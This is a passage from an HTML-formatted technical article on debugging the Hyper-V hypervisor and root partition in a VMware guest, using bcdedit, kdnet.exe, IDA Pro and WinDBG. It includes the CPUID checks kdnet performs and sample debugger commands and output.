hypervisor.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Choose </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Host Only</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for VMware VM network adapter option, go to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Edit->Virtual Network Editor </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">of VMware Workstation and see, that DHCP is configure for </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Host Only</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> subnet. Then, make sure, that guest OS network interface is normally assigned to this address, running command </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ipconfig /renew</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> inside guest.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Option </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings nodhcp </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">allows the debugger to use network mode, use ip-address of operation system. In this case, DHCP configuring in VMware is not necessary.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then run 2 instances of IDA PRO, set debugger – WinDBG (x64), the debug type to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Kernel Mode</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and specify the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process Option->Connection string </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">to the following line from the command above:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50002,Key=1.2.3.4 – root partition</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">net:port=50000,Key=5.6.7.8 – hypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It gives ability to simultaneously debug root-partition and the hypervisor. Network debugging is simpler for configuring and gives more speed, I recommend use it.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can use kdnet.exe, which was included in Debugging Tools for Windows 10, for configuring root-partition for debugging:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.35pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kdnet.exe 192.168.2.1 50002</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can see message “Microsoft hypervisor supports using KDNET in guest VMs”.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 87px; overflow: hidden; width: 595px;"><img height="87" src="https://lh4.googleusercontent.com/Et7jqqdYrC7IXe-N9gCmOFAF3hQtVjUzL2qK13w2Ow5TmlIWYrvwAwSrukKt5yIuAjLjlGQwKN3nCYKEeEsfpiUZs6zlVcx_frOPYShmdIlrgk7oobtjqSeXc8AkX5quLebBsWqNUs2jMjOqZQ" style="margin-left: 0px; margin-top: 0px;" width="595" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For checking this feature kdnet.exe:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Detecting the presence of a Hypervisor – cpuid(1), ecx[31] must be equivalent 1.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check Hypervisor Vendor ID Signature – cpuid (0x40000000) must return “Microsoft Hv” in ebx,ecx,edx registers.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check Hypervisor Interface Signature – cpuid(0x40000001), eax must contains Hv#1 (HviIsHypervisorMicrosoftCompatible) or Xbnv (HviIsAnyHypervisorPresent).</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Check Build Number – cpuid(0x40000002), it must be equivalent or above 0x23F0. If it below caption appears:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Microsoft hypervisor running this VM does not support KDNET. Please upgrade to the hypervisor shipped in Windows 8, Windows Server 2012 or later.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Execute cpuid (0x40000003) and check that ebx[12] must be 1 (it means that partition was created with CpuManagement flag)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally execute cpuid (0x40000004) – implementation recommendation. Check nested virtualization (bit 12), if presented, return true.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If all checks was passed kdnet prints message about KDNET supporting.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you configure guest virtual machine, kdnet.exe prints additional message:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Kdnet.exe 10.0.0.1 50020</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enabling network debugging on Intel(R) 82574L Gigabit Network Connection.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Manage-bde.exe not present. Bitlocker presumed disabled.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To debug this machine, run the following command on your debugger host machine.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">windbg -k net:port=50020,key=3p62jxxhmzlc1.3ygror9z6lgy.oq0wi18racbo.1fe0y66p7uzqe</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then reboot this machine by running shutdown -r -t 0 from this command prompt.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KDNET.exe read vmguid from HKLM\Software\Microsoft\Virtual Machine\Guest\Parameters\VirtualMachineId key and debugging key from HKLM\BCD00000000\Objects\{4636856e-540f-4170-a130-a84776f4c654}\Elements\1200001d\Element</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 110px; overflow: hidden; width: 434px;"><img height="110" src="https://lh4.googleusercontent.com/tGcEXR6opSVsb7vry3YGRi2bkz8Z07cXMTmHGHwL7Jlev2OdgnoGelIQtQa_wnVxdyyvvvQXp6oYoR08EuFeygY-gwWxxfpm67AdECA1T_ag6pq2rUefMZZrAEy4kykYU5JtVuwldKNoUrFG6A" style="margin-left: 0px; margin-top: 0px;" width="434" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">What WinDBG commands can be executed inside Hyper-V debugging session? Hyper-V kernel module doesn’t have symbols, therefore hvexts.dll extension is not accessible. But we can execute some standard WinDBG commands even without symbols. If some commands are not working, simply reload extensions:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load kext</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load kdexts</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load exts</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load ext</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">lm</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – view modules</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">k*</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - view stack</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">d*, e*</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - read\write data from virtual addresses</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!d*, !e*</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - read\write display data from physical addresses</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">r</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – display registers</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!vtop</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – translate virtual to physical addresses. First, get cr3 and paste it as first parameter. Va is second</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> !vtop 0x10839d000 0xfffffbb3aa6c3e66</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Virt fffffbb3aa6c3e66, pagedir 000000010839d000</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PML4E 000000010839dfb8</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDPE 000000010a603670</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: PDE 000000010a604a98</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Amd64VtoP: Large page mapped phys 00000001000c3e66</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Virtual address fffffbb3aa6c3e66 translates to physical address 1000c3e66.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; 